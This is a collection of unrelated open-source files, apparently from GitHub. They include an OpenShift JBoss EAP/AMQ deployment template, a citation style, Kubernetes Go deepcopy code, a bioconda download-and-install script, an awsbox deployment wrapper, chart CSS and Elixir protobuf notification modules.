"strategy": { "type": "Recreate" }, "triggers": [ { "type": "ImageChange", "imageChangeParams": { "automatic": true, "containerNames": [ "${APPLICATION_NAME}" ], "from": { "kind": "ImageStreamTag", "name": "${APPLICATION_NAME}:latest" } } }, { "type": "ConfigChange" } ], "replicas": 1, "selector": { "deploymentConfig": "${APPLICATION_NAME}" }, "template": { "metadata": { "name": "${APPLICATION_NAME}", "labels": { "deploymentConfig": "${APPLICATION_NAME}", "application": "${APPLICATION_NAME}" } }, "spec": { "terminationGracePeriodSeconds": 60, "containers": [ { "name": "${APPLICATION_NAME}", "image": "${APPLICATION_NAME}", "imagePullPolicy": "Always", "resources": { "limits": { "memory": "${MEMORY_LIMIT}" } }, "volumeMounts": [ { "name": "eap-keystore-volume", "mountPath": "/etc/eap-secret-volume", "readOnly": true }, { "name": "eap-jgroups-keystore-volume", "mountPath": "/etc/jgroups-encrypt-secret-volume", "readOnly": true } ], "livenessProbe": { "exec": { "command": [ "/bin/bash", "-c", "/opt/eap/bin/livenessProbe.sh" ] }, "initialDelaySeconds": 60 }, "readinessProbe": { "exec": { "command": [ "/bin/bash", "-c", "/opt/eap/bin/readinessProbe.sh" ] } }, "ports": [ { "name": "jolokia", "containerPort": 8778, "protocol": "TCP" }, { "name": "http", "containerPort": 8080, "protocol": "TCP" }, { "name": "https", "containerPort": 8443, "protocol": "TCP" }, { "name": "ping", "containerPort": 8888, "protocol": "TCP" } ], "env": [ { "name": "MQ_SERVICE_PREFIX_MAPPING", "value": "${APPLICATION_NAME}-amq=MQ" }, { "name": "MQ_JNDI", "value": "${MQ_JNDI}" }, { "name": "MQ_USERNAME", "value": "${MQ_USERNAME}" }, { "name": "MQ_PASSWORD", "value": "${MQ_PASSWORD}" }, { "name": "MQ_PROTOCOL", "value": "tcp" }, { "name": "MQ_QUEUES", "value": "${MQ_QUEUES}" }, { "name": "MQ_TOPICS", "value": "${MQ_TOPICS}" }, { "name": "MQ_SERIALIZABLE_PACKAGES", "value": "${MQ_SERIALIZABLE_PACKAGES}" }, { "name": "JGROUPS_PING_PROTOCOL", "value": "openshift.DNS_PING" }, { "name": "OPENSHIFT_DNS_PING_SERVICE_NAME", "value": "${APPLICATION_NAME}-ping" }, { "name": "OPENSHIFT_DNS_PING_SERVICE_PORT", "value": "8888" }, { "name": "HTTPS_KEYSTORE_DIR", "value": "/etc/eap-secret-volume" }, { "name": "HTTPS_KEYSTORE", "value": "${HTTPS_KEYSTORE}" }, { "name": "HTTPS_KEYSTORE_TYPE", "value": "${HTTPS_KEYSTORE_TYPE}" }, { "name": "HTTPS_NAME", "value": "${HTTPS_NAME}" }, { "name": "HTTPS_PASSWORD", "value": "${HTTPS_PASSWORD}" }, { "name": "JGROUPS_ENCRYPT_SECRET", "value": "${JGROUPS_ENCRYPT_SECRET}" }, { "name": "JGROUPS_ENCRYPT_KEYSTORE_DIR", "value": "/etc/jgroups-encrypt-secret-volume" }, { "name": "JGROUPS_ENCRYPT_KEYSTORE", "value": "${JGROUPS_ENCRYPT_KEYSTORE}" }, { "name": "JGROUPS_ENCRYPT_NAME", "value": "${JGROUPS_ENCRYPT_NAME}" }, { "name": "JGROUPS_ENCRYPT_PASSWORD", "value": "${JGROUPS_ENCRYPT_PASSWORD}" }, { "name": "JGROUPS_CLUSTER_PASSWORD", "value": "${JGROUPS_CLUSTER_PASSWORD}" }, { "name": "AUTO_DEPLOY_EXPLODED", "value": "${AUTO_DEPLOY_EXPLODED}" } ] } ], "volumes": [ { "name": "eap-keystore-volume", "secret": { "secretName": "${HTTPS_SECRET}" } }, { "name": "eap-jgroups-keystore-volume", "secret": { "secretName": "${JGROUPS_ENCRYPT_SECRET}" } } ] } } } }, { "kind": "DeploymentConfig", "apiVersion": "v1", "metadata": { "name": "${APPLICATION_NAME}-amq", "labels": { "application": "${APPLICATION_NAME}" } }, "spec": { "strategy": { "type": "Rolling", "rollingParams": { "maxSurge": 0 } }, "triggers": [ { "type": "ImageChange", "imageChangeParams": { "automatic": true, "containerNames": [ "${APPLICATION_NAME}-amq" ], "from": { "kind": "ImageStreamTag", "namespace": "${IMAGE_STREAM_NAMESPACE}", "name": "jboss-amq-62:1.7" } } }, { "type": "ConfigChange" } ], "replicas": 1, "selector": { "deploymentConfig": "${APPLICATION_NAME}-amq" }, "template": { "metadata": { "name": "${APPLICATION_NAME}-amq", "labels": { "deploymentConfig": "${APPLICATION_NAME}-amq", "application": "${APPLICATION_NAME}" } }, "spec": { "terminationGracePeriodSeconds": 60, "containers": [ { "name": "${APPLICATION_NAME}-amq", "image": "jboss-amq-62", "imagePullPolicy": "Always", "readinessProbe": { "exec": { "command": [ "/bin/bash", "-c", "/opt/amq/bin/readinessProbe.sh" ] } }, "ports": [ { "name": "jolokia", "containerPort": 8778, "protocol": "TCP" }, { "name": "amqp", "containerPort": 5672, "protocol": "TCP" }, { "name": "amqp-ssl", "containerPort": 5671, "protocol": "TCP" }, { "name": "mqtt", "containerPort": 1883, "protocol": "TCP" }, { "name": "stomp", "containerPort": 61613, "protocol": "TCP" }, { "name": "stomp-ssl", "containerPort": 61612, "protocol": "TCP" }, { "name": "tcp", "containerPort": 61616, "protocol": "TCP" }, { "name": "tcp-ssl", "containerPort": 61617, "protocol": "TCP" } ], "volumeMounts": [ { "mountPath": "/opt/amq/data/kahadb", "name": "${APPLICATION_NAME}-amq-pvol" } ], "env": [ { "name": "AMQ_USER", "value": "${MQ_USERNAME}" }, { "name": "AMQ_PASSWORD", "value": "${MQ_PASSWORD}" }, { "name": "AMQ_TRANSPORTS", "value": "${MQ_PROTOCOL}" }, { "name": "AMQ_QUEUES", "value": "${MQ_QUEUES}" }, { "name": "AMQ_TOPICS", "value": "${MQ_TOPICS}" }, { "name": "MQ_SERIALIZABLE_PACKAGES", "value": "${MQ_SERIALIZABLE_PACKAGES}" }, { "name": "AMQ_SPLIT", "value": "${AMQ_SPLIT}" }, { "name": "AMQ_MESH_DISCOVERY_TYPE", "value": "${AMQ_MESH_DISCOVERY_TYPE}" }, { "name": "AMQ_MESH_SERVICE_NAME", "value": "${APPLICATION_NAME}-amq-mesh" }, { "name": "AMQ_MESH_SERVICE_NAMESPACE", "valueFrom": { "fieldRef": { "fieldPath": "metadata.namespace" } } }, { "name": "AMQ_STORAGE_USAGE_LIMIT", "value": "${AMQ_STORAGE_USAGE_LIMIT}" } ] } ], "volumes": [ { "name": "${APPLICATION_NAME}-amq-pvol", "persistentVolumeClaim": { "claimName": "${APPLICATION_NAME}-amq-claim" } } ] } } } }, { "apiVersion": "v1", "kind": "PersistentVolumeClaim", "metadata": { "name": "${APPLICATION_NAME}-amq-claim", "labels": { "application": "${APPLICATION_NAME}" } }, "spec": { "accessModes": [ "ReadWriteOnce" ], "resources": { "requests": { "storage": "${VOLUME_CAPACITY}" } } } } ] }
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8"?> <style xmlns="http://purl.org/net/xbiblio/csl" version="1.0" default-locale="en-US"> <!-- Elsevier, generated from "elsevier" metadata at https://github.com/citation-style-language/journals --> <info> <title>Journal of Water Process Engineering</title> <id>http://www.zotero.org/styles/journal-of-water-process-engineering</id> <link href="http://www.zotero.org/styles/journal-of-water-process-engineering" rel="self"/> <link href="http://www.zotero.org/styles/elsevier-with-titles" rel="independent-parent"/> <category citation-format="numeric"/> <issn>2214-7144</issn> <updated>2018-02-16T12:00:00+00:00</updated> <rights license="http://creativecommons.org/licenses/by-sa/3.0/">This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License</rights> </info> </style>
{ "pile_set_name": "Github" }
// +build !ignore_autogenerated /* Copyright The Kubernetes Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ // Code generated by deepcopy-gen. DO NOT EDIT. package v1beta1 import ( v1 "k8s.io/apimachinery/pkg/apis/meta/v1" runtime "k8s.io/apimachinery/pkg/runtime" ) // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *AggregationRule) DeepCopyInto(out *AggregationRule) { *out = *in if in.ClusterRoleSelectors != nil { in, out := &in.ClusterRoleSelectors, &out.ClusterRoleSelectors *out = make([]v1.LabelSelector, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } return } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new AggregationRule. func (in *AggregationRule) DeepCopy() *AggregationRule { if in == nil { return nil } out := new(AggregationRule) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ClusterRole) DeepCopyInto(out *ClusterRole) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) if in.Rules != nil { in, out := &in.Rules, &out.Rules *out = make([]PolicyRule, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } if in.AggregationRule != nil { in, out := &in.AggregationRule, &out.AggregationRule if *in == nil { *out = nil } else { *out = new(AggregationRule) (*in).DeepCopyInto(*out) } } return } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ClusterRole. func (in *ClusterRole) DeepCopy() *ClusterRole { if in == nil { return nil } out := new(ClusterRole) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ClusterRole) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ClusterRoleBinding) DeepCopyInto(out *ClusterRoleBinding) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) if in.Subjects != nil { in, out := &in.Subjects, &out.Subjects *out = make([]Subject, len(*in)) copy(*out, *in) } out.RoleRef = in.RoleRef return } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ClusterRoleBinding. func (in *ClusterRoleBinding) DeepCopy() *ClusterRoleBinding { if in == nil { return nil } out := new(ClusterRoleBinding) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ClusterRoleBinding) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ClusterRoleBindingList) DeepCopyInto(out *ClusterRoleBindingList) { *out = *in out.TypeMeta = in.TypeMeta out.ListMeta = in.ListMeta if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]ClusterRoleBinding, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } return } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ClusterRoleBindingList. func (in *ClusterRoleBindingList) DeepCopy() *ClusterRoleBindingList { if in == nil { return nil } out := new(ClusterRoleBindingList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ClusterRoleBindingList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ClusterRoleList) DeepCopyInto(out *ClusterRoleList) { *out = *in out.TypeMeta = in.TypeMeta out.ListMeta = in.ListMeta if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]ClusterRole, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } return } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ClusterRoleList. func (in *ClusterRoleList) DeepCopy() *ClusterRoleList { if in == nil { return nil } out := new(ClusterRoleList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ClusterRoleList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *PolicyRule) DeepCopyInto(out *PolicyRule) { *out = *in if in.Verbs != nil { in, out := &in.Verbs, &out.Verbs *out = make([]string, len(*in)) copy(*out, *in) } if in.APIGroups != nil { in, out := &in.APIGroups, &out.APIGroups *out = make([]string, len(*in)) copy(*out, *in) } if in.Resources != nil { in, out := &in.Resources, &out.Resources *out = make([]string, len(*in)) copy(*out, *in) } if in.ResourceNames != nil { in, out := &in.ResourceNames, &out.ResourceNames *out = make([]string, len(*in)) copy(*out, *in) } if in.NonResourceURLs != nil { in, out := &in.NonResourceURLs, &out.NonResourceURLs *out = make([]string, len(*in)) copy(*out, *in) } return } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new PolicyRule. func (in *PolicyRule) DeepCopy() *PolicyRule { if in == nil { return nil } out := new(PolicyRule) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *Role) DeepCopyInto(out *Role) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) if in.Rules != nil { in, out := &in.Rules, &out.Rules *out = make([]PolicyRule, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } return } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new Role. func (in *Role) DeepCopy() *Role { if in == nil { return nil } out := new(Role) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *Role) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *RoleBinding) DeepCopyInto(out *RoleBinding) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) if in.Subjects != nil { in, out := &in.Subjects, &out.Subjects *out = make([]Subject, len(*in)) copy(*out, *in) } out.RoleRef = in.RoleRef return } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new RoleBinding. func (in *RoleBinding) DeepCopy() *RoleBinding { if in == nil { return nil } out := new(RoleBinding) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *RoleBinding) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *RoleBindingList) DeepCopyInto(out *RoleBindingList) { *out = *in out.TypeMeta = in.TypeMeta out.ListMeta = in.ListMeta if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]RoleBinding, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } return } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new RoleBindingList. func (in *RoleBindingList) DeepCopy() *RoleBindingList { if in == nil { return nil } out := new(RoleBindingList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *RoleBindingList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *RoleList) DeepCopyInto(out *RoleList) { *out = *in out.TypeMeta = in.TypeMeta out.ListMeta = in.ListMeta if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]Role, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } return } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new RoleList. func (in *RoleList) DeepCopy() *RoleList { if in == nil { return nil } out := new(RoleList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *RoleList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *RoleRef) DeepCopyInto(out *RoleRef) { *out = *in return } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new RoleRef. func (in *RoleRef) DeepCopy() *RoleRef { if in == nil { return nil } out := new(RoleRef) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *Subject) DeepCopyInto(out *Subject) { *out = *in return } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new Subject. func (in *Subject) DeepCopy() *Subject { if in == nil { return nil } out := new(Subject) in.DeepCopyInto(out) return out }
{ "pile_set_name": "Github" }
#include "qtoolbutton.h"
{ "pile_set_name": "Github" }
#!/bin/bash FN="MeSH.Nle.eg.db_1.13.0.tar.gz" URLS=( "https://bioconductor.org/packages/3.11/data/annotation/src/contrib/MeSH.Nle.eg.db_1.13.0.tar.gz" "https://bioarchive.galaxyproject.org/MeSH.Nle.eg.db_1.13.0.tar.gz" "https://depot.galaxyproject.org/software/bioconductor-mesh.nle.eg.db/bioconductor-mesh.nle.eg.db_1.13.0_src_all.tar.gz" "https://depot.galaxyproject.org/software/bioconductor-mesh.nle.eg.db/bioconductor-mesh.nle.eg.db_1.13.0_src_all.tar.gz" ) MD5="b3f6e100e363d4aa7696c9a85edb94c4" # Use a staging area in the conda dir rather than temp dirs, both to avoid # permission issues as well as to have things downloaded in a predictable # manner. STAGING=$PREFIX/share/$PKG_NAME-$PKG_VERSION-$PKG_BUILDNUM mkdir -p $STAGING TARBALL=$STAGING/$FN SUCCESS=0 for URL in ${URLS[@]}; do curl $URL > $TARBALL [[ $? == 0 ]] || continue # Platform-specific md5sum checks. if [[ $(uname -s) == "Linux" ]]; then if md5sum -c <<<"$MD5 $TARBALL"; then SUCCESS=1 break fi else if [[ $(uname -s) == "Darwin" ]]; then if [[ $(md5 $TARBALL | cut -f4 -d " ") == "$MD5" ]]; then SUCCESS=1 break fi fi fi done if [[ $SUCCESS != 1 ]]; then echo "ERROR: post-link.sh was unable to download any of the following URLs with the md5sum $MD5:" printf '%s\n' "${URLS[@]}" exit 1 fi # Install and clean up R CMD INSTALL --library=$PREFIX/lib/R/library $TARBALL rm $TARBALL rmdir $STAGING
{ "pile_set_name": "Github" }
#!/usr/bin/env node /* This Source Code Form is subject to the terms of the Mozilla Public * License, v. 2.0. If a copy of the MPL was not distributed with this * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ var path = require('path'), child_process = require('child_process'); /* * A thin wrapper around awsbox that expects certain env * vars and invokes awsbox for ya to deploy a VM. */ if (!process.env['AWS_ID'] || ! process.env['AWS_SECRET']) { console.log("You haven't defined AWS_ID and AWS_SECRET in the environment"); console.log("Get these values from the amazon web console and try again."); process.exit(1); } var cmd = path.join(__dirname, '..', 'node_modules', '.bin', 'awsbox'); cmd = path.relative(process.env['PWD'], cmd); if (['create', 'deploy'].indexOf(process.argv[2]) !== -1) { var options = {}; if (process.argv.length > 3) options.n = process.argv[3]; if (process.env['PERSONA_SSL_PRIV'] || process.env['PERSONA_SSL_PUB']) { options.p = process.env['PERSONA_SSL_PUB']; options.s = process.env['PERSONA_SSL_PRIV']; } // DNS is done with Route53, so if you have AWS keys, you get DNS (assuming // your Route53 is authoritative for the domain you choose). options.d = true; var scheme = (options.p ? 'https' : 'http') + '://'; if (process.env['PERSONA_DEPLOYMENT_HOSTNAME']) { options.u = scheme + process.env['PERSONA_DEPLOYMENT_HOSTNAME']; } else if (options.n) { var domain = process.env['PERSONA_DEPLOYMENT_DOMAIN'] || ".personatest.org"; options.u = scheme + options.n + domain; } // pass through/override with user provided vars for (var i = 3; i < process.argv.length; i++) { var k = process.argv[i]; if (i + 1 < process.argv.length && k.length === 2 && k[0] === '-') { options[k[1]] = process.argv[++i]; } } if (process.env['PERSONA_EPHEMERAL_CONFIG']) { options.x = process.env['PERSONA_EPHEMERAL_CONFIG']; } cmd += " create --ssl=force"; Object.keys(options).forEach(function(opt) { cmd += " -" + opt; cmd += typeof options[opt] === 'string' ? " " + options[opt] : ""; }); } else { // Otherwise, pass through args to awsbox cmd += " " + process.argv.slice(2).join(' '); } console.log("awsbox cmd: " + cmd); var cp = child_process.exec(cmd, function(err) { if (err) process.exit(err.code); else process.exit(0); }); cp.stdout.pipe(process.stdout); cp.stderr.pipe(process.stderr);
{ "pile_set_name": "Github" }
.nvd3.nv-candlestickBar .nv-ticks .nv-tick { stroke-width: 1px; } .nvd3.nv-candlestickBar .nv-ticks .nv-tick.hover { stroke-width: 2px; } .nvd3.nv-candlestickBar .nv-ticks .nv-tick.positive rect { stroke: #2ca02c; fill: #2ca02c; } .nvd3.nv-candlestickBar .nv-ticks .nv-tick.negative rect { stroke: #d62728; fill: #d62728; } .with-transitions .nv-candlestickBar .nv-ticks .nv-tick { transition: stroke-width 250ms linear, stroke-opacity 250ms linear; -moz-transition: stroke-width 250ms linear, stroke-opacity 250ms linear; -webkit-transition: stroke-width 250ms linear, stroke-opacity 250ms linear; } .nvd3.nv-candlestickBar .nv-ticks line { stroke: #333; }
{ "pile_set_name": "Github" }
defmodule Notifications.ExceptionInfo do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ class: String.t(), title: String.t(), msg: String.t(), backtrace: [String.t()] } defstruct [:class, :title, :msg, :backtrace] field :class, 1, type: :string field :title, 2, type: :string field :msg, 3, type: :string field :backtrace, 4, repeated: true, type: :string end defmodule Notifications.TimeInfo do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ start_time: String.t(), end_time: String.t() } defstruct [:start_time, :end_time] field :start_time, 1, type: :string field :end_time, 2, type: :string end defmodule Notifications.Profile.Control.Result do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ status: String.t(), code_desc: String.t(), run_time: float | :infinity | :negative_infinity | :nan, start_time: String.t(), message: String.t(), skip_message: String.t() } defstruct [:status, :code_desc, :run_time, :start_time, :message, :skip_message] field :status, 1, type: :string field :code_desc, 2, type: :string field :run_time, 3, type: :float field :start_time, 4, type: :string field :message, 5, type: :string field :skip_message, 6, type: :string end defmodule Notifications.Profile.Control.ResultTotals do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ num_tests: integer, num_failed_tests: integer, num_skipped_tests: integer, num_passed_tests: integer } defstruct [:num_tests, :num_failed_tests, :num_skipped_tests, :num_passed_tests] field :num_tests, 1, type: :int32 field :num_failed_tests, 2, type: :int32 field :num_skipped_tests, 3, type: :int32 field :num_passed_tests, 4, type: :int32 end defmodule Notifications.Profile.Control do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ id: String.t(), impact: float | :infinity | :negative_infinity | :nan, title: String.t(), code: String.t(), desc: String.t(), source_location: Notifications.SourceLocation.t() | nil, refs: [Notifications.Refs.t()], failed_results: [Notifications.Profile.Control.Result.t()], stats: Notifications.Profile.Control.ResultTotals.t() | nil } defstruct [:id, :impact, :title, :code, :desc, :source_location, :refs, :failed_results, :stats] field :id, 1, type: :string field :impact, 2, type: :float field :title, 3, type: :string field :code, 4, type: :string field :desc, 5, type: :string field :source_location, 6, type: Notifications.SourceLocation field :refs, 7, repeated: true, type: Notifications.Refs field :failed_results, 9, repeated: true, type: Notifications.Profile.Control.Result field :stats, 10, type: Notifications.Profile.Control.ResultTotals end defmodule Notifications.Profile.Attribute.Options do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ description: String.t() } defstruct [:description] field :description, 1, type: :string end defmodule Notifications.Profile.Attribute do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ name: String.t(), options: Notifications.Profile.Attribute.Options.t() | nil } defstruct [:name, :options] field :name, 1, type: :string field :options, 2, type: Notifications.Profile.Attribute.Options end defmodule Notifications.Profile.ControlTotals do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ num_tests: integer, num_failed_tests: integer, num_skipped_tests: integer, num_passed_tests: integer } defstruct [:num_tests, :num_failed_tests, :num_skipped_tests, :num_passed_tests] field :num_tests, 1, type: :int32 field :num_failed_tests, 2, type: :int32 field :num_skipped_tests, 3, type: :int32 field :num_passed_tests, 4, type: :int32 end defmodule Notifications.Profile do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ name: String.t(), title: String.t(), version: String.t(), summary: String.t(), maintainer: String.t(), license: String.t(), copyright: String.t(), copyright_email: String.t(), sha256: String.t(), supports: [Notifications.PlatformSupport.t()], attributes: [Notifications.Profile.Attribute.t()], failed_controls: [Notifications.Profile.Control.t()], stats: Notifications.Profile.ControlTotals.t() | nil } defstruct [ :name, :title, :version, :summary, :maintainer, :license, :copyright, :copyright_email, :sha256, :supports, :attributes, :failed_controls, :stats ] field :name, 1, type: :string field :title, 2, type: :string field :version, 3, type: :string field :summary, 4, type: :string field :maintainer, 5, type: :string field :license, 6, type: :string field :copyright, 7, type: :string field :copyright_email, 8, type: :string field :sha256, 9, type: :string field :supports, 10, repeated: true, type: Notifications.PlatformSupport field :attributes, 11, repeated: true, type: Notifications.Profile.Attribute field :failed_controls, 12, repeated: true, type: Notifications.Profile.Control field :stats, 13, type: Notifications.Profile.ControlTotals end defmodule Notifications.SourceLocation do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ ref: String.t(), line: integer } defstruct [:ref, :line] field :ref, 1, type: :string field :line, 2, type: :int32 end defmodule Notifications.Refs do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ uri: String.t(), url: String.t() } defstruct [:uri, :url] field :uri, 2, type: :string field :url, 3, type: :string end defmodule Notifications.PlatformSupport do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ inspec: String.t(), os_name: String.t(), os_family: String.t(), release: String.t() } defstruct [:inspec, :os_name, :os_family, :release] field :inspec, 1, type: :string field :os_name, 2, type: :string field :os_family, 3, type: :string field :release, 4, type: :string end defmodule Notifications.ComplianceSuccess do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ id: String.t(), compliance_url: String.t(), node_name: String.t(), node_id: String.t(), end_time: String.t(), timestamp: String.t() } defstruct [:id, :compliance_url, :node_name, :node_id, :end_time, :timestamp] field :id, 1, type: :string field :compliance_url, 2, type: :string field :node_name, 3, type: :string field :node_id, 4, type: :string field :end_time, 5, type: :string field :timestamp, 6, type: :string end defmodule Notifications.ComplianceFailure.ControlTotals do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ skipped: integer, passed: integer, failed: integer, critical: integer, critical_failed: integer } defstruct [:skipped, :passed, :failed, :critical, :critical_failed] field :skipped, 1, type: :int32 field :passed, 2, type: :int32 field :failed, 3, type: :int32 field :critical, 4, type: :int32 field :critical_failed, 5, type: :int32 end defmodule Notifications.ComplianceFailure do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ id: String.t(), compliance_url: String.t(), node_name: String.t(), node_id: String.t(), inspec_version: String.t(), test_totals: Notifications.ComplianceFailure.ControlTotals.t() | nil, failed_profiles: [Notifications.Profile.t()], end_time: String.t(), timestamp: String.t() } defstruct [ :id, :compliance_url, :node_name, :node_id, :inspec_version, :test_totals, :failed_profiles, :end_time, :timestamp ] field :id, 1, type: :string field :compliance_url, 2, type: :string field :node_name, 3, type: :string field :node_id, 4, type: :string field :inspec_version, 5, type: :string field :test_totals, 6, type: Notifications.ComplianceFailure.ControlTotals field :failed_profiles, 7, repeated: true, type: Notifications.Profile field :end_time, 8, type: :string field :timestamp, 9, type: :string end defmodule Notifications.CCRFailure do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ run_id: String.t(), node_name: String.t(), node_url: String.t(), run_url: String.t(), cookbook: String.t(), recipe: String.t(), time: Notifications.TimeInfo.t() | nil, exception: Notifications.ExceptionInfo.t() | nil, timestamp: String.t() } defstruct [ :run_id, :node_name, :node_url, :run_url, :cookbook, :recipe, :time, :exception, :timestamp ] field :run_id, 1, type: :string field :node_name, 2, type: :string field :node_url, 3, type: :string field :run_url, 4, type: :string field :cookbook, 5, type: :string field :recipe, 6, type: :string field :time, 7, type: Notifications.TimeInfo field :exception, 8, type: Notifications.ExceptionInfo field :timestamp, 9, type: :string end defmodule Notifications.CCRSuccess do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ run_id: String.t(), node_name: String.t(), run_url: String.t(), time: Notifications.TimeInfo.t() | nil, updated_resource_count: integer, timestamp: String.t() } defstruct [:run_id, :node_name, :run_url, :time, :updated_resource_count, :timestamp] field :run_id, 1, type: :string field :node_name, 2, type: :string field :run_url, 3, type: :string field :time, 4, type: Notifications.TimeInfo field :updated_resource_count, 5, type: :int32 field :timestamp, 6, type: :string end defmodule Notifications.Response do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{} defstruct [] end defmodule Notifications.Event do @moduledoc false use Protobuf, syntax: :proto3 @type t :: %__MODULE__{ event: {atom, any}, id: String.t() } defstruct [:event, :id] oneof :event, 0 field :id, 1, type: :string field :CCRSuccess, 2, type: Notifications.CCRSuccess, oneof: 0 field :CCRFailure, 3, type: Notifications.CCRFailure, oneof: 0 field :ComplianceSuccess, 4, type: Notifications.ComplianceSuccess, oneof: 0 field :ComplianceFailure, 5, type: Notifications.ComplianceFailure, oneof: 0 end
{ "pile_set_name": "Github" }
